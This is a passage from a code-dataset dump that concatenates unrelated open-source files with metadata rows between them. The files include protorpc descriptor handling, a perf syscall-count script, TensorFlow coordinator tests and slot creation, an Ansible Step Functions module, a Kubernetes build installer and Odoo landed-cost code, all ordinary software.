parent, child = split_name
try:
parent_definition = import_descriptor_loader(
parent, importer=importer)
except messages.DefinitionNotFoundError:
# Fall through to original error.
pass
else:
# Check the parent definition for a matching descriptor.
if isinstance(parent_definition, EnumDescriptor):
search_list = parent_definition.values or []
elif isinstance(parent_definition, MessageDescriptor):
search_list = parent_definition.fields or []
else:
search_list = []
for definition in search_list:
if definition.name == child:
return definition
# Still didn't find. Reraise original exception.
raise err
class DescriptorLibrary(object):
"""A descriptor library is an object that contains known definitions.
A descriptor library contains a cache of descriptor objects mapped by
definition name. It contains all types of descriptors except for
file sets.
When a definition name is requested that the library does not know about
it can be provided with a descriptor loader which attempt to resolve the
missing descriptor.
"""
@util.positional(1)
def __init__(self,
descriptors=None,
descriptor_loader=import_descriptor_loader):
"""Constructor.
Args:
descriptors: A dictionary or dictionary-like object that can be used
to store and cache descriptors by definition name.
definition_loader: A function used for resolving missing descriptors.
The function takes a definition name as its parameter and returns
an appropriate descriptor. It may raise DefinitionNotFoundError.
"""
self.__descriptor_loader = descriptor_loader
self.__descriptors = descriptors or {}
def lookup_descriptor(self, definition_name):
"""Lookup descriptor by name.
Get descriptor from library by name. If descriptor is not found will
attempt to find via descriptor loader if provided.
Args:
definition_name: Definition name to find.
Returns:
Descriptor that describes definition name.
Raises:
DefinitionNotFoundError if not descriptor exists for definition name.
"""
try:
return self.__descriptors[definition_name]
except KeyError:
pass
if self.__descriptor_loader:
definition = self.__descriptor_loader(definition_name)
self.__descriptors[definition_name] = definition
return definition
else:
raise messages.DefinitionNotFoundError(
'Could not find definition for %s' % definition_name)
def lookup_package(self, definition_name):
"""Determines the package name for any definition.
Determine the package that any definition name belongs to. May
check parent for package name and will resolve missing
descriptors if provided descriptor loader.
Args:
definition_name: Definition name to find package for.
"""
while True:
descriptor = self.lookup_descriptor(definition_name)
if isinstance(descriptor, FileDescriptor):
return descriptor.package
else:
index = definition_name.rfind('.')
if index < 0:
return None
definition_name = definition_name[:index]
| mit | -7,551,161,985,702,244,000 | 31.03252 | 79 | 0.67802 | false |
teamacid/android_kernel_teamacid | tools/perf/scripts/python/syscall-counts.py | 944 | 1429 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
pass
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40d %10d\n" % (id, val),
| gpl-2.0 | -3,290,188,331,221,186,000 | 23.637931 | 77 | 0.611617 | false |
JiscPER/magnificent-octopus | octopus/modules/swordv2/client_http.py | 1 | 1816 | from sword2 import HttpLayer, HttpResponse
from octopus.lib import http
import json
from requests.auth import HTTPBasicAuth
class OctopusHttpResponse(HttpResponse):
def __init__(self, *args, **kwargs):
self.resp = None
if len(args) > 0:
self.resp = args[0]
def __getitem__(self, att):
return self.get(att)
def __repr__(self):
return self.resp.__repr__()
@property
def status(self):
if self.resp is None:
return 408 # timeout
return self.resp.status_code
def get(self, att, default=None):
if att == "status":
return self.status
if self.resp is None:
return default
return self.resp.headers.get(att, default)
def keys(self):
return self.resp.headers.keys()
class OctopusHttpLayer(HttpLayer):
def __init__(self, *args, **kwargs):
self.username = None
self.password = None
self.auth = None
def add_credentials(self, username, password):
self.username = username
self.password = password
self.auth = HTTPBasicAuth(username, password)
def request(self, uri, method, headers=None, payload=None): # Note that body can be file-like
resp = None
if method == "GET":
resp = http.get(uri, headers=headers, auth=self.auth)
elif method == "POST":
resp = http.post(uri, headers=headers, data=payload, auth=self.auth)
elif method == "PUT":
resp = http.put(uri, headers=headers, data=payload, auth=self.auth)
elif method == "DELETE":
resp = http.delete(uri, headers=headers, auth=self.auth)
if resp is None:
return OctopusHttpResponse(), u""
return OctopusHttpResponse(resp), resp.text
| apache-2.0 | 6,734,626,440,960,297,000 | 29.266667 | 100 | 0.59967 | false |
awni/tensorflow | tensorflow/python/training/coordinator_test.py | 6 | 4200 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
import tensorflow as tf
def StopInN(coord, n_secs):
time.sleep(n_secs)
coord.request_stop()
def RaiseInN(coord, n_secs, ex, report_exception):
try:
time.sleep(n_secs)
raise ex
except RuntimeError as e:
if report_exception:
coord.request_stop(e)
else:
coord.request_stop(sys.exc_info())
def RaiseInNUsingContextHandler(coord, n_secs, ex):
with coord.stop_on_exception():
time.sleep(n_secs)
raise ex
def SleepABit(n_secs):
time.sleep(n_secs)
class CoordinatorTest(tf.test.TestCase):
def testStopAPI(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
threading.Thread(target=StopInN, args=(coord, 0.02)).start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
self.assertTrue(coord.wait_for_stop(0.03))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))]
for t in threads:
t.start()
coord.join(threads)
def testJoinGraceExpires(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=StopInN, args=(coord, 0.01)),
threading.Thread(target=SleepABit, args=(10.0,))]
for t in threads:
t.daemon = True
t.start()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=0.02)
def testJoinRaiseReportExcInfo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), False)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), False))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportException(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), True))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportExceptionUsingHandler(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.01, RuntimeError("First"))),
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.02, RuntimeError("Too late")))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 5,699,396,441,109,231,000 | 30.578947 | 80 | 0.652143 | false |
fujunwei/chromium-crosswalk | native_client_sdk/src/tools/decode_dump.py | 51 | 6717 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility to decode a crash dump generated by untrusted_crash_dump.[ch]
Currently this produces a simple stack trace.
"""
import argparse
import json
import os
import posixpath
import subprocess
import sys
class CoreDecoder(object):
"""Class to process core dumps."""
def __init__(self, main_nexe, nmf_filename,
addr2line, library_paths, platform):
"""Construct and object to process core dumps.
Args:
main_nexe: nexe to resolve NaClMain references from.
nmf_filename: nmf to resolve references from.
addr2line: path to appropriate addr2line.
library_paths: list of paths to search for libraries.
platform: platform string to use in nmf files.
"""
self.main_nexe = main_nexe
self.nmf_filename = nmf_filename
if nmf_filename == '-':
self.nmf_data = {}
else:
self.nmf_data = json.load(open(nmf_filename))
self.addr2line = addr2line
self.library_paths = library_paths
self.platform = platform
def _SelectModulePath(self, filename):
"""Select which path to get a module from.
Args:
filename: filename of a module (as appears in phdrs).
Returns:
Full local path to the file.
Derived by consulting the manifest.
"""
# For some names try the main nexe.
# NaClMain is the argv[0] setup in sel_main.c
# (null) shows up in chrome.
if self.main_nexe is not None and filename in ['NaClMain', '(null)']:
return self.main_nexe
filepart = posixpath.basename(filename)
nmf_entry = self.nmf_data.get('files', {}).get(filepart, {})
nmf_url = nmf_entry.get(self.platform, {}).get('url')
# Try filename directly if not in manifest.
if nmf_url is None:
return filename
# Look for the module relative to the manifest (if any),
# then in other search paths.
paths = []
if self.nmf_filename != '-':
paths.append(os.path.dirname(self.nmf_filename))
paths.extend(self.library_paths)
for path in paths:
pfilename = os.path.join(path, nmf_url)
if os.path.exists(pfilename):
return pfilename
# If nothing else, try the path directly.
return filename
def _DecodeAddressSegment(self, segments, address):
"""Convert an address to a segment relative one, plus filename.
Args:
segments: a list of phdr segments.
address: a process wide code address.
Returns:
A tuple of filename and segment relative address.
"""
for segment in segments:
for phdr in segment['dlpi_phdr']:
start = segment['dlpi_addr'] + phdr['p_vaddr']
end = start + phdr['p_memsz']
if address >= start and address < end:
return (segment['dlpi_name'], address - segment['dlpi_addr'])
return ('(null)', address)
def _Addr2Line(self, segments, address):
"""Use addr2line to decode a code address.
Args:
segments: A list of phdr segments.
address: a code address.
Returns:
A list of dicts containing: function, filename, lineno.
"""
filename, address = self._DecodeAddressSegment(segments, address)
filename = self._SelectModulePath(filename)
if not os.path.exists(filename):
return [{
'function': 'Unknown_function',
'filename': 'unknown_file',
'lineno': -1,
}]
# Use address - 1 to get the call site instead of the line after.
address -= 1
cmd = [
self.addr2line, '-f', '--inlines', '-e', filename, '0x%08x' % address,
]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE)
process_stdout, _ = process.communicate()
assert process.returncode == 0
lines = process_stdout.splitlines()
assert len(lines) % 2 == 0
results = []
for index in xrange(len(lines) / 2):
func = lines[index * 2]
afilename, lineno = lines[index * 2 + 1].split(':', 1)
results.append({
'function': func,
'filename': afilename,
'lineno': int(lineno),
})
return results
def Decode(self, text):
core = json.loads(text)
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def LoadAndDecode(self, core_path):
"""Given a core.json file, load and embellish with decoded addresses.
Args:
core_path: source file containing a dump.
Returns:
An embellished core dump dict (decoded code addresses).
"""
core = json.load(open(core_path))
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def StackTrace(self, info):
"""Convert a decoded core.json dump to a simple stack trace.
Args:
info: core.json info with decoded code addresses.
Returns:
A list of dicts with filename, lineno, function (deepest first).
"""
trace = []
for frame in info['frames']:
for scope in frame['scopes']:
trace.append(scope)
return trace
def PrintTrace(self, trace, out):
"""Print a trace to a file like object.
Args:
trace: A list of [filename, lineno, function] (deepest first).
out: file like object to output the trace to.
"""
for scope in trace:
out.write('%s at %s:%d\n' % (
scope['function'],
scope['filename'],
scope['lineno']))
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-m', '--main-nexe',
help='nexe to resolve NaClMain references from')
parser.add_argument('-n', '--nmf', default='-',
help='nmf to resolve references from')
parser.add_argument('-a', '--addr2line',
help='path to appropriate addr2line')
parser.add_argument('-L', '--library-path', dest='library_paths',
action='append', default=[],
help='path to search for shared libraries')
parser.add_argument('-p', '--platform',
help='platform in a style match nmf files')
parser.add_argument('core_json')
options = parser.parse_args(args)
decoder = CoreDecoder(
main_nexe=options.main_nexe,
nmf_filename=options.nmf,
addr2line=options.addr2line,
library_paths=options.library_paths,
platform=options.platform)
info = decoder.LoadAndDecode(options.core_json)
trace = decoder.StackTrace(info)
decoder.PrintTrace(trace, sys.stdout)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| bsd-3-clause | -2,393,938,606,953,182,700 | 31.606796 | 78 | 0.630043 | false |
apollo13/ansible | test/support/integration/plugins/modules/aws_step_functions_state_machine_execution.py | 27 | 6479 | #!/usr/bin/python
# Copyright (c) 2019, Prasad Katti (@prasadkatti)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: aws_step_functions_state_machine_execution
short_description: Start or stop execution of an AWS Step Functions state machine.
version_added: "2.10"
description:
- Start or stop execution of a state machine in AWS Step Functions.
options:
action:
description: Desired action (start or stop) for a state machine execution.
default: start
choices: [ start, stop ]
type: str
name:
description: Name of the execution.
type: str
execution_input:
description: The JSON input data for the execution.
type: json
default: {}
state_machine_arn:
description: The ARN of the state machine that will be executed.
type: str
execution_arn:
description: The ARN of the execution you wish to stop.
type: str
cause:
description: A detailed explanation of the cause for stopping the execution.
type: str
default: ''
error:
description: The error code of the failure to pass in when stopping the execution.
type: str
default: ''
extends_documentation_fragment:
- aws
- ec2
author:
- Prasad Katti (@prasadkatti)
'''
EXAMPLES = '''
- name: Start an execution of a state machine
aws_step_functions_state_machine_execution:
name: an_execution_name
execution_input: '{ "IsHelloWorldExample": true }'
state_machine_arn: "arn:aws:states:us-west-2:682285639423:stateMachine:HelloWorldStateMachine"
- name: Stop an execution of a state machine
aws_step_functions_state_machine_execution:
action: stop
execution_arn: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
cause: "cause of task failure"
error: "error code of the failure"
'''
RETURN = '''
execution_arn:
description: ARN of the AWS Step Functions state machine execution.
type: str
returned: if action == start and changed == True
sample: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
start_date:
description: The date the execution is started.
type: str
returned: if action == start and changed == True
sample: "2019-11-02T22:39:49.071000-07:00"
stop_date:
description: The date the execution is stopped.
type: str
returned: if action == stop
sample: "2019-11-02T22:39:49.071000-07:00"
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by AnsibleAWSModule
def start_execution(module, sfn_client):
'''
start_execution uses execution name to determine if a previous execution already exists.
If an execution by the provided name exists, call client.start_execution will not be called.
'''
state_machine_arn = module.params.get('state_machine_arn')
name = module.params.get('name')
execution_input = module.params.get('execution_input')
try:
# list_executions is eventually consistent
page_iterators = sfn_client.get_paginator('list_executions').paginate(stateMachineArn=state_machine_arn)
for execution in page_iterators.build_full_result()['executions']:
if name == execution['name']:
check_mode(module, msg='State machine execution already exists.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be started.', changed=True)
res_execution = sfn_client.start_execution(
stateMachineArn=state_machine_arn,
name=name,
input=execution_input
)
except (ClientError, BotoCoreError) as e:
if e.response['Error']['Code'] == 'ExecutionAlreadyExists':
# this will never be executed anymore
module.exit_json(changed=False)
module.fail_json_aws(e, msg="Failed to start execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res_execution))
def stop_execution(module, sfn_client):
cause = module.params.get('cause')
error = module.params.get('error')
execution_arn = module.params.get('execution_arn')
try:
# describe_execution is eventually consistent
execution_status = sfn_client.describe_execution(executionArn=execution_arn)['status']
if execution_status != 'RUNNING':
check_mode(module, msg='State machine execution is not running.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be stopped.', changed=True)
res = sfn_client.stop_execution(
executionArn=execution_arn,
cause=cause,
error=error
)
except (ClientError, BotoCoreError) as e:
module.fail_json_aws(e, msg="Failed to stop execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res))
def check_mode(module, msg='', changed=False):
if module.check_mode:
module.exit_json(changed=changed, output=msg)
def main():
module_args = dict(
action=dict(choices=['start', 'stop'], default='start'),
name=dict(type='str'),
execution_input=dict(type='json', default={}),
state_machine_arn=dict(type='str'),
cause=dict(type='str', default=''),
error=dict(type='str', default=''),
execution_arn=dict(type='str')
)
module = AnsibleAWSModule(
argument_spec=module_args,
required_if=[('action', 'start', ['name', 'state_machine_arn']),
('action', 'stop', ['execution_arn']),
],
supports_check_mode=True
)
sfn_client = module.client('stepfunctions')
action = module.params.get('action')
if action == "start":
start_execution(module, sfn_client)
else:
stop_execution(module, sfn_client)
if __name__ == '__main__':
main()
| gpl-3.0 | 3,782,714,493,292,858,400 | 31.888325 | 132 | 0.659361 | false |
nburn42/tensorflow | tensorflow/python/training/slot_creator.py | 16 | 7900 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Standard functions for creating slots.
A slot is a `Variable` created with the same shape as a primary variable or
`Tensor`. A slot is always scoped in the namespace of the primary object and
typically has the same device and type.
Slots are typically used as accumulators to track values associated with
the primary object:
```python
# Optimizers can create a slot for each variable to track accumulators
accumulators = {var : create_zeros_slot(var, "momentum") for var in vs}
for var in vs:
apply_momentum(var, accumulators[var], lr, grad, momentum_tensor)
# Slots can also be used for moving averages
mavg = create_slot(var, var.initialized_value(), "exponential_moving_avg")
update_mavg = mavg.assign_sub((mavg - var) * (1 - decay))
```
"""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.training import distribute as distribute_lib
def _create_slot_var(primary, val, scope, validate_shape, shape, dtype):
"""Helper function for creating a slot variable."""
# TODO(lukaszkaiser): Consider allowing partitioners to be set in the current
# scope.
current_partitioner = variable_scope.get_variable_scope().partitioner
variable_scope.get_variable_scope().set_partitioner(None)
# When init from val instead of callable initializer, the shape is expected to
# be None, not <unknown> or any fully defined shape.
shape = shape if callable(val) else None
slot = variable_scope.get_variable(
scope, initializer=val, trainable=False,
use_resource=resource_variable_ops.is_resource_variable(primary),
shape=shape, dtype=dtype,
validate_shape=validate_shape)
variable_scope.get_variable_scope().set_partitioner(current_partitioner)
# pylint: disable=protected-access
if isinstance(primary, variables.Variable) and primary._save_slice_info:
# Primary is a partitioned variable, so we need to also indicate that
# the slot is a partitioned variable. Slots have the same partitioning
# as their primaries.
# For examples when using AdamOptimizer in linear model, slot.name
# here can be "linear//weights/Adam:0", while primary.op.name is
# "linear//weight". We want to get 'Adam' as real_slot_name, so we
# remove "'linear//weight' + '/'" and ':0'.
real_slot_name = slot.name[len(primary.op.name + "/"):-2]
slice_info = primary._save_slice_info
slot._set_save_slice_info(variables.Variable.SaveSliceInfo(
slice_info.full_name + "/" + real_slot_name,
slice_info.full_shape[:],
slice_info.var_offset[:],
slice_info.var_shape[:]))
# pylint: enable=protected-access
return slot
def create_slot(primary, val, name, colocate_with_primary=True):
"""Create a slot initialized to the given value.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
val: A `Tensor` specifying the initial value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = val.get_shape().is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, val, "", validate_shape, None, None)
else:
return _create_slot_var(primary, val, "", validate_shape, None, None)
def create_slot_with_initializer(primary, initializer, shape, dtype, name,
colocate_with_primary=True):
"""Creates a slot initialized using an `Initializer`.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
initializer: An `Initializer`. The initial value of the slot.
shape: Shape of the initial value of the slot.
dtype: Type of the value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = shape.is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
else:
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
def create_zeros_slot(primary, name, dtype=None, colocate_with_primary=True):
"""Create a slot initialized to 0 with same shape as the primary object.
Args:
primary: The primary `Variable` or `Tensor`.
name: Name to use for the slot variable.
dtype: Type of the slot variable. Defaults to the type of `primary`.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
if dtype is None:
dtype = primary.dtype
slot_shape = primary.get_shape()
if slot_shape.is_fully_defined():
initializer = init_ops.zeros_initializer(dtype)
return create_slot_with_initializer(
primary, initializer, slot_shape, dtype, name,
colocate_with_primary=colocate_with_primary)
else:
if isinstance(primary, variables.Variable):
slot_shape = array_ops.shape(primary.initialized_value())
else:
slot_shape = array_ops.shape(primary)
val = array_ops.zeros(slot_shape, dtype=dtype)
return create_slot(primary, val, name,
colocate_with_primary=colocate_with_primary)
| apache-2.0 | 653,503,145,435,336,300 | 40.798942 | 80 | 0.702152 | false |
qma/pants | tests/python/pants_test/java/jar/test_manifest.py | 33 | 1127 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import unittest
from pants.java.jar.manifest import Manifest
class TestManifest(unittest.TestCase):
def test_isempty(self):
manifest = Manifest()
self.assertTrue(manifest.is_empty())
manifest.addentry('Header', 'value')
self.assertFalse(manifest.is_empty())
def test_addentry(self):
manifest = Manifest()
manifest.addentry('Header', 'value')
self.assertEquals(
'Header: value\n', manifest.contents())
def test_too_long_entry(self):
manifest = Manifest()
with self.assertRaises(ValueError):
manifest.addentry(
'1234567890123456789012345678901234567890'
'12345678901234567890123456789', 'value')
def test_nonascii_char(self):
manifest = Manifest()
with self.assertRaises(UnicodeEncodeError):
manifest.addentry('X-Copyright', '© 2015')
| apache-2.0 | 1,113,774,149,357,478,400 | 29.432432 | 93 | 0.701599 | false |
mylons/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/kubernetes_installer.py | 149 | 4138 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shlex
import subprocess
from path import Path
def run(command, shell=False):
""" A convience method for executing all the commands. """
print(command)
if shell is False:
command = shlex.split(command)
output = subprocess.check_output(command, shell=shell)
print(output)
return output
class KubernetesInstaller():
"""
This class contains the logic needed to install kuberentes binary files.
"""
def __init__(self, arch, version, output_dir):
""" Gather the required variables for the install. """
# The kubernetes-master charm needs certain commands to be aliased.
self.aliases = {'kube-apiserver': 'apiserver',
'kube-controller-manager': 'controller-manager',
'kube-proxy': 'kube-proxy',
'kube-scheduler': 'scheduler',
'kubectl': 'kubectl',
'kubelet': 'kubelet'}
self.arch = arch
self.version = version
self.output_dir = Path(output_dir)
def build(self, branch):
""" Build kubernetes from a github repository using the Makefile. """
# Remove any old build artifacts.
make_clean = 'make clean'
run(make_clean)
# Always checkout the master to get the latest repository information.
git_checkout_cmd = 'git checkout master'
run(git_checkout_cmd)
# When checking out a tag, delete the old branch (not master).
if branch != 'master':
git_drop_branch = 'git branch -D {0}'.format(self.version)
print(git_drop_branch)
rc = subprocess.call(git_drop_branch.split())
if rc != 0:
print('returned: %d' % rc)
# Make sure the git repository is up-to-date.
git_fetch = 'git fetch origin {0}'.format(branch)
run(git_fetch)
if branch == 'master':
git_reset = 'git reset --hard origin/master'
run(git_reset)
else:
# Checkout a branch of kubernetes so the repo is correct.
checkout = 'git checkout -b {0} {1}'.format(self.version, branch)
run(checkout)
# Create an environment with the path to the GO binaries included.
go_path = ('/usr/local/go/bin', os.environ.get('PATH', ''))
go_env = os.environ.copy()
go_env['PATH'] = ':'.join(go_path)
print(go_env['PATH'])
# Compile the binaries with the make command using the WHAT variable.
make_what = "make all WHAT='cmd/kube-apiserver cmd/kubectl "\
"cmd/kube-controller-manager plugin/cmd/kube-scheduler "\
"cmd/kubelet cmd/kube-proxy'"
print(make_what)
rc = subprocess.call(shlex.split(make_what), env=go_env)
def install(self, install_dir=Path('/usr/local/bin')):
""" Install kubernetes binary files from the output directory. """
if not install_dir.isdir():
install_dir.makedirs_p()
# Create the symbolic links to the real kubernetes binaries.
for key, value in self.aliases.iteritems():
target = self.output_dir / key
if target.exists():
link = install_dir / value
if link.exists():
link.remove()
target.symlink(link)
else:
print('Error target file {0} does not exist.'.format(target))
exit(1)
| apache-2.0 | 3,144,394,251,100,722,000 | 37.672897 | 78 | 0.60174 | false |
ubiar/odoo | addons/stock_landed_costs/stock_landed_costs.py | 56 | 18361 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
import product
class stock_landed_cost(osv.osv):
_name = 'stock.landed.cost'
_description = 'Stock Landed Cost'
_inherit = 'mail.thread'
_track = {
'state': {
'stock_landed_costs.mt_stock_landed_cost_open': lambda self, cr, uid, obj, ctx=None: obj['state'] == 'done',
},
}
def _total_amount(self, cr, uid, ids, name, args, context=None):
result = {}
for cost in self.browse(cr, uid, ids, context=context):
total = 0.0
for line in cost.cost_lines:
total += line.price_unit
result[cost.id] = total
return result
def _get_cost_line(self, cr, uid, ids, context=None):
cost_to_recompute = []
for line in self.pool.get('stock.landed.cost.lines').browse(cr, uid, ids, context=context):
cost_to_recompute.append(line.cost_id.id)
return cost_to_recompute
def get_valuation_lines(self, cr, uid, ids, picking_ids=None, context=None):
picking_obj = self.pool.get('stock.picking')
lines = []
if not picking_ids:
return lines
for picking in picking_obj.browse(cr, uid, picking_ids):
for move in picking.move_lines:
#it doesn't make sense to make a landed cost for a product that isn't set as being valuated in real time at real cost
if move.product_id.valuation != 'real_time' or move.product_id.cost_method != 'real':
continue
total_cost = 0.0
total_qty = move.product_qty
weight = move.product_id and move.product_id.weight * move.product_qty
volume = move.product_id and move.product_id.volume * move.product_qty
for quant in move.quant_ids:
total_cost += quant.cost
vals = dict(product_id=move.product_id.id, move_id=move.id, quantity=move.product_uom_qty, former_cost=total_cost * total_qty, weight=weight, volume=volume)
lines.append(vals)
if not lines:
